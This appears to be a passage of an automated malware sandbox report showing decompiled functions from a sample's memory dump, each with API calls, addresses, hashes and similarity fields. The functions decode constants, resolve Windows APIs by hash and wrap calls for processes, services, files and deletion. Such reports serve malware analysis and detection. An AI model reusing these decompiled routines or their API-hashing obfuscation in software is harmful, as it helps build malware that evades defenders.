				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x007a295f
                                          0x007a2964
                                          0x007a2967
                                          0x007a296a
                                          0x007a296d
                                          0x007a296e
                                          0x007a296f
                                          0x007a2977
                                          0x007a2985
                                          0x007a298a
                                          0x007a2992
                                          0x007a299a
                                          0x007a29a2
                                          0x007a29a9
                                          0x007a29b0
                                          0x007a29b7
                                          0x007a29bb
                                          0x007a29cf
                                          0x007a29dc
                                          0x007a29e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 007A29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 3c9219e7960b641eb35d90ec273b61ea86f7d417f0455c733e893febdd344bb6
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 13018072A00108BFEB14DF95DC0A8DFBFB6EF45310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007AC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E007AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E007A602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E007B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x007ac6e1
                                          0x007ac6e6
                                          0x007ac6f0
                                          0x007ac6fc
                                          0x007ac703
                                          0x007ac706
                                          0x007ac70d
                                          0x007ac711
                                          0x007ac715
                                          0x007ac71c
                                          0x007ac723
                                          0x007ac72a
                                          0x007ac731
                                          0x007ac738
                                          0x007ac751
                                          0x007ac762
                                          0x007ac768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 007AC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: e9a86e8e37b7de8203378364023d38d806515300457840ddf2b215e3c811edbb
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 2E1122B290122DBBCB259F94DC498DFBEB9EF05714F108188F90962210D7714A659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007A1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E007A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E007A602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E007B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x007a1006
                                          0x007a1009
                                          0x007a100c
                                          0x007a1011
                                          0x007a1016
                                          0x007a101d
                                          0x007a1026
                                          0x007a102d
                                          0x007a1034
                                          0x007a103b
                                          0x007a1047
                                          0x007a104f
                                          0x007a1057
                                          0x007a105e
                                          0x007a1065
                                          0x007a106c
                                          0x007a1073
                                          0x007a1077
                                          0x007a108b
                                          0x007a1096
                                          0x007a109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 007A1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 286b32172467e8b2513f1050e968d30947f2b42d0733e7bc148998b90b461b9a
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: A5016DB6D0130CFBDF04DFA4C94AADEBBB1EF54318F108188E51466291D7B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007A4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E007A4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E007B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x007a485e
                                          0x007a487a
                                          0x007a487d
                                          0x007a4884
                                          0x007a488b
                                          0x007a4892
                                          0x007a489d
                                          0x007a48a0
                                          0x007a48ad
                                          0x007a48b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 007A48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 4ea4bf6190abebc6345f7dd47a99b9ed50677059344869cbce81c2b57805d603
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: E8F017B0A05209FBDB04CFE8CA56A9EBFB9EB40301F20818CE444B7290E7B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007B4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E007B4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E007A602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E007B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x007b4f80
                                          0x007b4f81
                                          0x007b4f82
                                          0x007b4f86
                                          0x007b4f87
                                          0x007b4f8c
                                          0x007b4fa5
                                          0x007b4fa8
                                          0x007b4faf
                                          0x007b4fb6
                                          0x007b4fc7
                                          0x007b4fca
                                          0x007b4fd7
                                          0x007b4fe2
                                          0x007b4fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 007B4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: e3dad91b9b52d58f11f7dc5270ad02058aaf6527cba4fe69feafc317bc48b7e0
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: FCF037B081120CFFDF04DFA4D94689EBFBAEB40300F208299E804AB250D7715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007B976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E007B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E007B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x007b9772
                                          0x007b9773
                                          0x007b9778
                                          0x007b977a
                                          0x007b977b
                                          0x007b977e
                                          0x007b977f
                                          0x007b9782
                                          0x007b9785
                                          0x007b9788
                                          0x007b9789
                                          0x007b978c
                                          0x007b978f
                                          0x007b9790
                                          0x007b9791
                                          0x007b9794
                                          0x007b9797
                                          0x007b979a
                                          0x007b979d
                                          0x007b97a0
                                          0x007b97a3
                                          0x007b97a6
                                          0x007b97a7
                                          0x007b97a8
                                          0x007b97ad
                                          0x007b97b7
                                          0x007b97c3
                                          0x007b97ca
                                          0x007b97d1
                                          0x007b97d8
                                          0x007b97df
                                          0x007b97e3
                                          0x007b97fc
                                          0x007b9816
                                          0x007b981d

                                          APIs
                                          • CreateProcessW.KERNEL32(007A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,007A591A), ref: 007B9816
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 106350383b1bf39c4c23831b759dc2dbcd108dd66316b1276b5e4b075e754bda
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 4711D372800148FBDF199F92DC0ACDF7F3AEF89750F104148FA1452120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007AB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E007AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E007A602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E007B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x007ab569
                                          0x007ab56a
                                          0x007ab56d
                                          0x007ab572
                                          0x007ab574
                                          0x007ab577
                                          0x007ab57a
                                          0x007ab57d
                                          0x007ab580
                                          0x007ab583
                                          0x007ab586
                                          0x007ab587
                                          0x007ab58a
                                          0x007ab58d
                                          0x007ab590
                                          0x007ab593
                                          0x007ab594
                                          0x007ab595
                                          0x007ab59a
                                          0x007ab5a4
                                          0x007ab5b8
                                          0x007ab5c0
                                          0x007ab5c4
                                          0x007ab5cb
                                          0x007ab5d2
                                          0x007ab5d9
                                          0x007ab5e6
                                          0x007ab5fd
                                          0x007ab604

                                          APIs
                                          • CreateFileW.KERNELBASE(007B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,007B0668,?,?,?,?), ref: 007AB5FD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 82a14351892a751336632add9106223c7e80d56c520847f727f77829c527bb16
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: F511B072801248BBDF169F95DD0ACEE7F7AEF89314F148198FA1862120D2769A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007B981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E007B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E007B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x007b9821
                                          0x007b9822
                                          0x007b9825
                                          0x007b9828
                                          0x007b982a
                                          0x007b982c
                                          0x007b982f
                                          0x007b9832
                                          0x007b9835
                                          0x007b9836
                                          0x007b9837
                                          0x007b983c
                                          0x007b9855
                                          0x007b9858
                                          0x007b985f
                                          0x007b9866
                                          0x007b986d
                                          0x007b9874
                                          0x007b987b
                                          0x007b988e
                                          0x007b989b
                                          0x007b98a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,007A87F2,0000CAAE,0000510C,AD82F196), ref: 007B989B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 181ddc80a47fbe3fbeff89c703e2d33791be3369811d9a2f3f04186ef97f403b
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 6C019A72801208FBDF04EFE5D84ACDFBF79EF85310F108188F908A6220E6715B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007B7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E007B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007A602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E007B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x007b7bf7
                                          0x007b7bf8
                                          0x007b7bfa
                                          0x007b7bfd
                                          0x007b7bff
                                          0x007b7c02
                                          0x007b7c06
                                          0x007b7c07
                                          0x007b7c0f
                                          0x007b7c1d
                                          0x007b7c25
                                          0x007b7c2d
                                          0x007b7c31
                                          0x007b7c38
                                          0x007b7c3f
                                          0x007b7c46
                                          0x007b7c4a
                                          0x007b7c5e
                                          0x007b7c67
                                          0x007b7c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 007B7C67
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 536c9ffa875a1eb34a730b66a55622bf98e2d6209e296d7a4e2cae8dab280425
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 3D0128B1901208FFEB09DFA4C84A9DEBBB9EB45314F208198F505A7240EAB15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007AF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E007AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007A602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E007B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x007af662
                                          0x007af663
                                          0x007af665
                                          0x007af668
                                          0x007af66a
                                          0x007af66d
                                          0x007af670
                                          0x007af673
                                          0x007af677
                                          0x007af678
                                          0x007af67d
                                          0x007af687
                                          0x007af693
                                          0x007af69a
                                          0x007af6a1
                                          0x007af6a5
                                          0x007af6a9
                                          0x007af6b0
                                          0x007af6c9
                                          0x007af6d8
                                          0x007af6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 007AF6D8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 1aa1fa918a3dd380c14e4509bff9e99d9e8fdd885f9bf77fd439d302178ca718
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC0A8DF7F75EB05324F148188F90462250D6B65E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007AB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E007AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E007A602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E007B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x007ab6f3
                                          0x007ab6f8
                                          0x007ab702
                                          0x007ab70b
                                          0x007ab712
                                          0x007ab719
                                          0x007ab720
                                          0x007ab727
                                          0x007ab72e
                                          0x007ab747
                                          0x007ab759
                                          0x007ab75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 007AB759
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 245dab289efc7ae8f9cedfaa9deac136d7d86aa22ac8cc0474dc49557940e97e
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 8E018FB194030CFBEF45DF90DD06E9E7BB5EF04704F108188FA0526190D7B15E209B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007BAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E007BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007A602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E007B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x007baa3f
                                          0x007baa40
                                          0x007baa41
                                          0x007baa44
                                          0x007baa47
                                          0x007baa4b
                                          0x007baa4c
                                          0x007baa51
                                          0x007baa5b
                                          0x007baa64
                                          0x007baa68
                                          0x007baa6f
                                          0x007baa76
                                          0x007baa8d
                                          0x007baa90
                                          0x007baa9d
                                          0x007baaa8
                                          0x007baaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 007BAAA8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: f7845bce609a3b863407f447fa21ec69eca3b5a684c167219a78ee05fe94b98d
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: C6F069B190020CFFDF08DFA4DD4A99FBFB5EB41304F108188F905A6250D7B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

